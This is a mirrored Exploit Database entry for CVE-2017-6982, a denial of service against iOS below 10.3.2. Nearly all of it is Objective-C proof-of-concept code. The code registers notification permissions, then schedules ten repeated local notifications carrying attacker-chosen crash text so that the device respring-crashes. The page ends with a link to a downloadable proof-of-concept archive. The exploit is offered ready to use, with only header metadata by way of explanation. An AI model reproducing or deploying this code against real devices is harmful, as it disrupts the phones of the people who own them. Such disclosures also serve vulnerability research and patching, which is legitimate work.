Apple iOS < 10.3.2 - Notifications API Denial of Service

• Exploit Database
• 104 阅读

• 作者： CoffeeBreakers
  日期： 2017-05-17
• 类别：

  • dos
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/42014/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135

  # Exploit Title: Apple iOS < 10.3.2 - Notifications API Denial of Service # Date: 05-15-2017 # Exploit Author: Sem Voigtländer (@OxFEEDFACE), Vincent Desmurs (@vincedes3) and Joseph Shenton # Vendor Homepage: https://apple.com # Software Link: https://support.apple.com/en-us/HT207798 # Version: iOS 10.3.2 # Tested on: iOS 10.3.2 iPhone 6 # CVE : CVE-2017-6982   # We do not disclose a PoC for remote notifications. # PoC for local notifications. (Objective-C).     defaults = [NSUserDefaults standardUserDefaults]; UIUserNotificationType types = UIUserNotificationTypeBadge | UIUserNotificationTypeSound | UIUserNotificationTypeAlert; UIUserNotificationSettings *mySettings = [UIUserNotificationSettings settingsForTypes:types categories:nil]; [[UIApplication sharedApplication] registerUserNotificationSettings:mySettings];   //1 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize];   NSTimeInterval interval; interval = 5; //Time here in second to respring UILocalNotification* localNotification = [[UILocalNotification alloc] init]; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //2 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //3 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //4 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //5 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //6 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //7 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //8 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //9 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];   //10 [defaults setBool:YES forKey:@"notificationIsActive"]; [defaults synchronize]; interval = 5; localNotification.fireDate = [NSDate dateWithTimeIntervalSinceNow:interval]; localNotification.alertBody = _crashtext.text; localNotification.timeZone = [NSTimeZone defaultTimeZone]; localNotification.repeatInterval = NSCalendarUnitYear; localNotification.soundName = UILocalNotificationDefaultSoundName; [[UIApplication sharedApplication] scheduleLocalNotification:localNotification];     Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42014.zip